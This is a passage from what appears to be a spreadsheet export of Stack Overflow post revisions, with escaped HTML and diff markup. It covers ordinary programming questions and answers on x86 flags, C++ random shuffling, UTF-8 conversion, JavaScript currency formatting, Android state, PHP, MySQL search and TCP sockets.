    c = c + n_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This is one of the quirky areas of Python that has never really sat well with me.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>sdleihssirhc</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; It tests whether &lt;code&gt;eax&lt;/code&gt; is 0, or above, or below. In this case, the jump is taken if &lt;code&gt;eax&lt;/code&gt; is 0.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;test eax,eax&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; sets all flags exactly the same way that &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;cmp eax, 0&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; would. (CF and OF cleared. ZF, SF and PF according to the value in EAX.)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt;(Except for the obsolete ASCII-carry flag AF, which &lt;/span&gt;&lt;a href="http://www.felixcloutier.com/x86/TEST.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;TEST leaves undefined&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;, but which &lt;/span&gt;&lt;a href="http://www.felixcloutier.com/x86/CMP.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;CMP sets "according to the result"&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;. Since subtracting zero can't produce a carry from the 4th to 5th bit, CMP should always clear AF).&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Since TEST is smaller (no immediate) and sometimes faster (can macro-fuse with a JCC in more cases), the only common reason for using CMP with an immediate 0 is when you want to compare against a memory operand (like &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;cmpb $0, (%esi)&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; to check for a terminating zero byte at the end of an implicit-length C-style string).&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; It tests whether &lt;code&gt;eax&lt;/code&gt; is 0, or above, or below. In this case, the jump is taken if &lt;code&gt;eax&lt;/code&gt; is 0.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Peter Cordes</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If I have a java file or class file (*.class) how can I convert it to an .exe file&lt;span class="diff-delete"&gt; &amp;nbsp;&lt;/span&gt;? I also need an installer for my program. Is there is an open source program that can do that&lt;span class="diff-delete"&gt; &amp;nbsp;&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If I have a java file or class file (*.class) how can I convert it to an .exe file? I also need an installer for my program. Is there is an open source program that can do that?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>levik</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a program that uses the mt19937 random number generator from boost::random. I need to do a random_shuffle and want the random numbers generated for this to be from this shared state so that they can be deterministic with respect to the mersenne twister's previously generated numbers.&lt;/p&gt; _x000D_
 &lt;p&gt; I tried something like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;_x000D_
    &lt;/span&gt;void foo(std::&lt;span class="diff-delete"&gt;vector&amp;lt;unsigned&amp;gt;&lt;/span&gt; &lt;span class="diff-delete"&gt;&amp;amp;vec&lt;/span&gt;, boost::mt19937 &lt;span class="diff-delete"&gt;&amp;amp;state&lt;/span&gt;)_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;{_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    struct bar {_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;        boost::mt19937 &lt;span class="diff-delete"&gt;&amp;amp;_state;&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;        unsigned operator()(unsigned i) {_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;            boost::&lt;span class="diff-delete"&gt;uniform_int&amp;lt;&amp;gt;&lt;/span&gt; rng(0, i - 1);_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;            return rng(_state);_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;        }_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;        bar(boost::mt19937 &lt;span class="diff-delete"&gt;&amp;amp;state&lt;/span&gt;) : _state(state) {}_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    } rand(state);_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    std::random_shuffle(vec.begin(), vec.end(), rand);_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; But i get a template error calling random_shuffle with rand. However this works:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;_x000D_
    &lt;/span&gt;unsigned bar(unsigned i)_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;{_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    boost::mt19937 no_state;_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    boost::&lt;span class="diff-delete"&gt;uniform_int&amp;lt;&amp;gt;&lt;/span&gt; rng(0, i - 1);_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    return rng(no_state);_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;}_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;void foo(std::&lt;span class="diff-delete"&gt;vector&amp;lt;unsigned&amp;gt;&lt;/span&gt; &lt;span class="diff-delete"&gt;&amp;amp;vec&lt;/span&gt;, boost::mt19937 &lt;span class="diff-delete"&gt;&amp;amp;state&lt;/span&gt;)_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;{_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    std::random_shuffle(vec.begin(), vec.end(), bar);_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;}&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Probably because it is an actual function call. But obviously this doesn't keep the state from the original mersenne twister. What gives? Is there any way to do what I'm trying to do without global variables?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a program that uses the mt19937 random number generator from boost::random. I need to do a random_shuffle and want the random numbers generated for this to be from this shared state so that they can be deterministic with respect to the mersenne twister's previously generated numbers.&lt;/p&gt; _x000D_
 &lt;p&gt; I tried something like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;void foo(std::&lt;span class="diff-add"&gt;vector&amp;lt;unsigned&amp;gt;&lt;/span&gt; &lt;span class="diff-add"&gt;&amp;amp;vec&lt;/span&gt;, boost::mt19937 &lt;span class="diff-add"&gt;&amp;amp;state&lt;/span&gt;)_x000D_
{_x000D_
    struct bar {_x000D_
        boost::mt19937 &lt;span class="diff-add"&gt;&amp;amp;_state;&lt;/span&gt;_x000D_
        unsigned operator()(unsigned i) {_x000D_
            boost::&lt;span class="diff-add"&gt;uniform_int&amp;lt;&amp;gt;&lt;/span&gt; rng(0, i - 1);_x000D_
            return rng(_state);_x000D_
        }_x000D_
        bar(boost::mt19937 &lt;span class="diff-add"&gt;&amp;amp;state&lt;/span&gt;) : _state(state) {}_x000D_
    } rand(state);_x000D_
_x000D_
    std::random_shuffle(vec.begin(), vec.end(), rand);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; But i get a template error calling random_shuffle with rand. However this works:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;unsigned bar(unsigned i)_x000D_
{_x000D_
    boost::mt19937 no_state;_x000D_
    boost::&lt;span class="diff-add"&gt;uniform_int&amp;lt;&amp;gt;&lt;/span&gt; rng(0, i - 1);_x000D_
    return rng(no_state);_x000D_
}_x000D_
void foo(std::&lt;span class="diff-add"&gt;vector&amp;lt;unsigned&amp;gt;&lt;/span&gt; &lt;span class="diff-add"&gt;&amp;amp;vec&lt;/span&gt;, boost::mt19937 &lt;span class="diff-add"&gt;&amp;amp;state&lt;/span&gt;)_x000D_
{_x000D_
    std::random_shuffle(vec.begin(), vec.end(), bar);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Probably because it is an actual function call. But obviously this doesn't keep the state from the original mersenne twister. What gives? Is there any way to do what I'm trying to do without global variables?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is it possible to convert UTF8 string in a std::string to std::wstring and vice versa in a platform independent manner? In a Windows application I would use &lt;code&gt;&lt;span class="diff-delete"&gt;MultiByteToWideChar&lt;/span&gt;&lt;/code&gt; and &lt;code&gt;&lt;span class="diff-delete"&gt;WideCharToMultiByte&lt;/span&gt;&lt;/code&gt;. However, the code is compiled for multiple OSes and I'm limited to&lt;span class="diff-delete"&gt; the&lt;/span&gt; standard C++ library.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is it possible to convert UTF8 string in a std::string to std::wstring and vice versa in a platform independent manner? In a Windows application I would use &lt;span class="diff-add"&gt;MultiByteToWideChar&lt;/span&gt; and &lt;span class="diff-add"&gt;WideCharToMultiByte&lt;/span&gt;. However, the code is compiled for multiple OSes and I'm limited to standard C++ library.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Vladimir Grigorov</t>
  </si>
  <si>
    <t>Raedwald</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I would like to format a price in JavaScript.&lt;br&gt; Basically, I have a float variable, and I'd like to have a function that will receive that variable, and output:&lt;/p&gt; _x000D_
 &lt;p&gt; "$ 2,500.00"&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I would like to format a price in JavaScript.&lt;br&gt; Basically, I have a float variable, and I'd like to have a function that will receive that variable, and output:&lt;/p&gt; _x000D_
 &lt;p&gt; "$ 2,500.00"&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; What's the best way to do this?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; EDIT: OK, since I haven't gotten any answers better than the code I implemented, plus my own answer has been voted down and I can't put my own answer as the right one... Here it is...&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre class="lang-js s-code-block hljs javascript"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; DecimalSeparator = &lt;span class="hljs-built_in"&gt;Number&lt;/span&gt;(&lt;span class="hljs-string"&gt;"1.2"&lt;/span&gt;).toLocaleString().substr(&lt;span class="hljs-number"&gt;1&lt;/span&gt;,&lt;span class="hljs-number"&gt;1&lt;/span&gt;);_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; AmountWithCommas = Amount.toLocaleString();_x000D_
&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; arParts = &lt;span class="hljs-built_in"&gt;String&lt;/span&gt;(AmountWithCommas).split(DecimalSeparator);_x000D_
&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; intPart = arParts[&lt;span class="hljs-number"&gt;0&lt;/span&gt;];_x000D_
&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; decPart = (arParts.length &amp;gt; &lt;span class="hljs-number"&gt;1&lt;/span&gt; ? arParts[&lt;span class="hljs-number"&gt;1&lt;/span&gt;] : &lt;span class="hljs-string"&gt;''&lt;/span&gt;);_x000D_
decPart = (decPart + &lt;span class="hljs-string"&gt;'00'&lt;/span&gt;).substr(&lt;span class="hljs-number"&gt;0&lt;/span&gt;,&lt;span class="hljs-number"&gt;2&lt;/span&gt;);_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-string"&gt;'£ '&lt;/span&gt; + intPart + DecimalSeparator + decPart;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Daniel Magliola</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In .NET, what is the difference between String.Empty and "", and are they interchangable, or is there some underlying reference or Localization issues around equality that String.Empty will ensure are not a problem?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;EDIT&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; Not sure who between Brain and Esteban got in first here with the same info, but I had to chose one to be an answer. Thanks to both, and to everyone else who answered.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In .NET, what is the difference between String.Empty and "", and are they interchangable, or is there some underlying reference or Localization issues around equality that String.Empty will ensure are not a problem?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've been working on Android SDK platform, and it is a little unclear how to save an application's state. So given this minor re-tooling of the 'Hello, Android' example:&lt;span class="diff-delete"&gt;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lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs scala"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;package&lt;/span&gt; com.android.hello;_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;import&lt;/span&gt; android.app.&lt;span class="hljs-type"&gt;Activity&lt;/span&gt;;_x000D_
&lt;span class="hljs-keyword"&gt;import&lt;/span&gt; android.os.&lt;span class="hljs-type"&gt;Bundle&lt;/span&gt;;_x000D_
&lt;span class="hljs-keyword"&gt;import&lt;/span&gt; android.widget.&lt;span class="hljs-type"&gt;TextView&lt;/span&gt;;_x000D_
_x000D_
public &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;HelloAndroid&lt;/span&gt; &lt;span class="hljs-keyword"&gt;extends&lt;/span&gt; &lt;span class="hljs-title"&gt;Activity&lt;/span&gt; &lt;/span&gt;{_x000D_
_x000D_
  &lt;span class="hljs-keyword"&gt;private&lt;/span&gt; &lt;span class="hljs-type"&gt;TextView&lt;/span&gt; mTextView = &lt;span class="hljs-literal"&gt;null&lt;/span&gt;;_x000D_
_x000D_
  &lt;span class="hljs-comment"&gt;/** Called when the activity is first created. */&lt;/span&gt;_x000D_
  &lt;span class="hljs-meta"&gt;@Override&lt;/span&gt;_x000D_
  public void onCreate(&lt;span class="hljs-type"&gt;Bundle&lt;/span&gt; savedInstanceState) {_x000D_
    &lt;span class="hljs-keyword"&gt;super&lt;/span&gt;.onCreate(savedInstanceState);_x000D_
_x000D_
    mTextView = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; &lt;span class="hljs-type"&gt;TextView&lt;/span&gt;(&lt;span class="hljs-keyword"&gt;this&lt;/span&gt;);_x000D_
_x000D_
    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (savedInstanceState == &lt;span class="hljs-literal"&gt;null&lt;/span&gt;) {_x000D_
       mTextView.setText(&lt;span class="hljs-string"&gt;"Welcome to HelloAndroid!"&lt;/span&gt;);_x000D_
    } &lt;span class="hljs-keyword"&gt;else&lt;/span&gt; {_x000D_
       mTextView.setText(&lt;span class="hljs-string"&gt;"Welcome back."&lt;/span&gt;);_x000D_
    }_x000D_
_x000D_
    setContentView(mTextView);_x000D_
  }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I thought it would be enough for the simplest case, but it always responds with the first message, no matter how I navigate away from the app.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm sure the solution is as simple as overriding &lt;code&gt;onPause&lt;/code&gt; or something like that, but I've been poking away in the documentation for 30 minutes or so and haven't found anything obvious.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've been working on Android SDK platform, and it is a little unclear how to save an application's state. So given this minor re-tooling of the 'Hello, Android' example:&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs scala"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;package&lt;/span&gt; com.android.hello;_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;import&lt;/span&gt; android.app.&lt;span class="hljs-type"&gt;Activity&lt;/span&gt;;_x000D_
&lt;span class="hljs-keyword"&gt;import&lt;/span&gt; android.os.&lt;span class="hljs-type"&gt;Bundle&lt;/span&gt;;_x000D_
&lt;span class="hljs-keyword"&gt;import&lt;/span&gt; android.widget.&lt;span class="hljs-type"&gt;TextView&lt;/span&gt;;_x000D_
_x000D_
public &lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-title"&gt;HelloAndroid&lt;/span&gt; &lt;span class="hljs-keyword"&gt;extends&lt;/span&gt; &lt;span class="hljs-title"&gt;Activity&lt;/span&gt; &lt;/span&gt;{_x000D_
_x000D_
  &lt;span class="hljs-keyword"&gt;private&lt;/span&gt; &lt;span class="hljs-type"&gt;TextView&lt;/span&gt; mTextView = &lt;span class="hljs-literal"&gt;null&lt;/span&gt;;_x000D_
_x000D_
  &lt;span class="hljs-comment"&gt;/** Called when the activity is first created. */&lt;/span&gt;_x000D_
  &lt;span class="hljs-meta"&gt;@Override&lt;/span&gt;_x000D_
  public void onCreate(&lt;span class="hljs-type"&gt;Bundle&lt;/span&gt; savedInstanceState) {_x000D_
    &lt;span class="hljs-keyword"&gt;super&lt;/span&gt;.onCreate(savedInstanceState);_x000D_
_x000D_
    mTextView = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; &lt;span class="hljs-type"&gt;TextView&lt;/span&gt;(&lt;span class="hljs-keyword"&gt;this&lt;/span&gt;);_x000D_
_x000D_
    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (savedInstanceState == &lt;span class="hljs-literal"&gt;null&lt;/span&gt;) {_x000D_
       mTextView.setText(&lt;span class="hljs-string"&gt;"Welcome to HelloAndroid!"&lt;/span&gt;);_x000D_
    } &lt;span class="hljs-keyword"&gt;else&lt;/span&gt; {_x000D_
       mTextView.setText(&lt;span class="hljs-string"&gt;"Welcome back."&lt;/span&gt;);_x000D_
    }_x000D_
_x000D_
    setContentView(mTextView);_x000D_
  }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I thought it would be enough for the simplest case, but it always responds with the first message, no matter how I navigate away from the app.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm sure the solution is as simple as overriding &lt;code&gt;onPause&lt;/code&gt; or something like that, but I've been poking away in the documentation for 30 minutes or so and haven't found anything obvious.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What are all the &lt;span class="diff-delete"&gt;C++&lt;/span&gt; blogs that you follow&lt;span class="diff-delete"&gt;?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;strong&gt;Please add one &lt;span class="diff-delete"&gt;URL&lt;/span&gt; for &lt;span class="diff-delete"&gt;each&lt;/span&gt; posting.&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What are all the &lt;span class="diff-add"&gt;c++&lt;/span&gt; blogs that you follow&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;strong&gt;Please add one &lt;span class="diff-add"&gt;url&lt;/span&gt; for &lt;span class="diff-add"&gt;one&lt;/span&gt; posting.&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>yesraaj</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; From &lt;a href="http://www.phpbuilder.com/board/showthread.php?t=10354489" rel="nofollow noreferrer"&gt;http://www.phpbuilder.com/board/showthread.php?t=10354489&lt;/a&gt;:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Use &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;$this&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; to refer to the current object. Use &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;self&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; to refer to the current class. In other words, use &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;$this-&amp;gt;member&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; for non-static members, use &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;self::$member&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; for static members.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; From &lt;a href="http://www.phpbuilder.com/board/showthread.php?t=10354489" rel="nofollow noreferrer"&gt;http://www.phpbuilder.com/board/showthread.php?t=10354489&lt;/a&gt;:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-add"&gt; Use &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;$this&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; to refer to the current object. Use &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;self&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; to refer to the current class. In other words, use &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;$this-&amp;gt;member&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; for non-static members, use &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;self::$member&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; for static members.&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Amal Murali</t>
  </si>
  <si>
    <t>Deepu</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Yes, the most efficient way usually is searching in the database. To do that you have three alternatives:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://dev.mysql.com/doc/refman/5.0/en/string-comparison-functions.html" rel="nofollow noreferrer"&gt;LIKE, ILIKE&lt;/a&gt; to match exact substrings&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://dev.mysql.com/doc/refman/5.0/en/pattern-matching.html" rel="nofollow noreferrer"&gt;RLIKE&lt;/a&gt; to match POSIX regexes&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://dev.mysql.com/doc/refman/5.0/en/fulltext-search.html" rel="nofollow noreferrer"&gt;FULLTEXT&lt;/a&gt; indexes to match another three different kinds of search aimed at natural language processing&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; So it depends what will you be actually searching for what would be the best way. For books &lt;span class="diff-delete"&gt;title&lt;/span&gt; I'd offer a LIKE search for exact substrings useful when people know the book they're looking for and a FULLTEXT search to help find titles similar to a word or phrase. I'd give them different names of course (textual and similar or the like)&lt;/p&gt; _x000D_
 &lt;p&gt; An example about fulltext: &lt;a href="http://www.onlamp.com/pub/a/onlamp/2003/06/26/fulltext.html" rel="nofollow noreferrer"&gt;http://www.onlamp.com/pub/a/onlamp/2003/06/26/fulltext.html&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Yes, the most efficient way usually is searching in the database. To do that you have three alternatives:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://dev.mysql.com/doc/refman/5.0/en/string-comparison-functions.html" rel="nofollow noreferrer"&gt;LIKE, ILIKE&lt;/a&gt; to match exact substrings&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://dev.mysql.com/doc/refman/5.0/en/pattern-matching.html" rel="nofollow noreferrer"&gt;RLIKE&lt;/a&gt; to match POSIX regexes&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://dev.mysql.com/doc/refman/5.0/en/fulltext-search.html" rel="nofollow noreferrer"&gt;FULLTEXT&lt;/a&gt; indexes to match another three different kinds of search aimed at natural language processing&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; So it depends&lt;span class="diff-add"&gt; on&lt;/span&gt; what will you be actually searching for&lt;span class="diff-add"&gt; to decide&lt;/span&gt; what would be the best way. For books &lt;span class="diff-add"&gt;titles&lt;/span&gt; I'd offer a LIKE search for exact substrings useful when people know the book they're looking for and a FULLTEXT search to help find titles similar to a word or phrase. I'd give them different names of course (textual and similar or the like)&lt;/p&gt; _x000D_
 &lt;p&gt; An example about fulltext: &lt;a href="http://www.onlamp.com/pub/a/onlamp/2003/06/26/fulltext.html" rel="nofollow noreferrer"&gt;http://www.onlamp.com/pub/a/onlamp/2003/06/26/fulltext.html&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Vinko Vrsalovic</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;h2&gt;Summary&lt;/h2&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;A TCP socket is an endpoint &lt;em&gt;instance&lt;/em&gt;&lt;/strong&gt; defined by an IP address and a port in the context of either a particular TCP connection or the listening state.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;A port is a virtualisation identifier&lt;/strong&gt; defining a service endpoint (as distinct from a service &lt;em&gt;instance&lt;/em&gt; endpoint aka session identifier).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;A TCP socket is &lt;em&gt;not&lt;/em&gt; a connection&lt;/strong&gt;, it is the endpoint of a specific connection.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;There can be concurrent connections to a service endpoint&lt;/strong&gt;, because a connection is identified by &lt;em&gt;both its local and remote&lt;/em&gt; endpoints, allowing traffic to be routed to a specific service instance.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;There can only be one listener socket for a given address/port combination&lt;/strong&gt;.&lt;/p&gt; _x000D_
 &lt;h2&gt;Exposition&lt;/h2&gt; _x000D_
 &lt;p&gt; This was an interesting question that forced me to re-examine a number of things I thought I knew inside out. You'd think a name like "socket" would be self-explanatory: it was obviously chosen to evoke imagery of the endpoint into which you plug a network cable, there being strong functional parallels. Nevertheless, in network parlance the word "socket" carries so much baggage that a careful re-examination is necessary.&lt;/p&gt; _x000D_
 &lt;p&gt; In the broadest possible sense, a port is a point of ingress or egress. Ports, then, are transportation endpoints whether you ship data or big steel containers.&lt;/p&gt; _x000D_
 &lt;p&gt; For the purpose of this discussion I will limit consideration to the context of TCP-IP networks. The OSI model is all very well but has never been completely implemented, much less widely deployed in high-traffic high-stress conditions.&lt;/p&gt; _x000D_
 &lt;p&gt; The combination of an IP address and a port is strictly known as an endpoint and is sometimes called a socket. This usage originates with RFC793, the original TCP specification.&lt;/p&gt; _x000D_
 &lt;p&gt; A TCP &lt;em&gt;connection&lt;/em&gt; is defined by two endpoints aka &lt;em&gt;sockets&lt;/em&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; An endpoint (socket) is defined by the combination of a network address and a &lt;em&gt;port&lt;/em&gt; identifier. Note that address/port does &lt;em&gt;not&lt;/em&gt; completely identify a socket (more on this later).&lt;/p&gt; _x000D_
